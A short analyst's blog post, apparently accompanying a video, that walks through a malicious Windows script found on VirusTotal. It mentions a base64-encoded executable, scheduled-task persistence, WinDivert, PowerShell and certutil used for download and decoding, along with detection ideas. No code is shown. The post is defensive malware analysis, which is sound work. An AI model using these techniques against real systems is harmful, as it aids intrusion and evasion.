Full Disclosure: I am on maternity leave. That means my brain is pretty much 95% baby focused (instead of object oriented programming I am now baby oriented programming). Apologies for the mis-said things in the video.
However, it nice to dip into some 'fun' stuff to see what's happening in the more job focused side of my life. I grabbed a random script from VT which triggered on a base64 encoded executable.
Persistence is maintained by creation of a scheduled task
So I say 'name' for nttyuuyt when I should have said process name nttyuuyt.
So... my thoughts on this:
Never heard of WinDivert before so its use is new to me
Again the use of powershell and other built in windows functions is 'living off the land', making it a bit harder to detect
At the time of writing this, only 14 of the 52 AV tools available in VirusTotal detected this. If you are still using just AV for detection you are in some serious doo-doo.
The use of certutil is a classic method baddies use to download files and decode base64 on Windows. Sure some devs may use this feature but its a simple thing to detect on. You can even look for user agents in proxy traffic to detect its use.